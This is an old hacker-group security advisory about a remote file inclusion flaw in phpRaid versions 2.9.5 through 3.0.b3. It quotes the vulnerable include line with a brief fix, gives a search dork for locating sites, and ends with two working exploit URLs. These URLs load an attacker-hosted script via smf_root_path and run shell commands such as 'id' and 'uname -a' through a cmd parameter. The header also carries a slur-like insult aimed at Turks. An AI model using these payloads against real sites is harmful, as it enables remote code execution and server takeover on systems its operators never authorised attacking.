# Kurdish Security Advisory # phpRaid Remote File Include [SMF] :} # "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan # Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org # Risk : High # Class : Remote # Script : phpRaid # Script Website : http://www.spiffyjr.com # Version : phpRaid v2.9.5 " v3.0.b1 " v3.0.b2 " v3.0.b3 # Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D # Special Bastard : Turkish Lame # w0rkz : "phpRaid" "inurl:"phpRaid" etc. :) --------------------------------------------------------------------- # cmd shell example: # cmd shell variable: ($_GET[cmd]); Vulnerable code (SMF portal integration) :) // includes include($smf_root_path . 'SSI.php'); -- $smf_root_path is taken from the request and used as an include path without validation, so the included file is attacker-controlled; the fix is to set $smf_root_path only from trusted local configuration and never accept it as a request parameter. ----------------------------------------------------------------------- http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a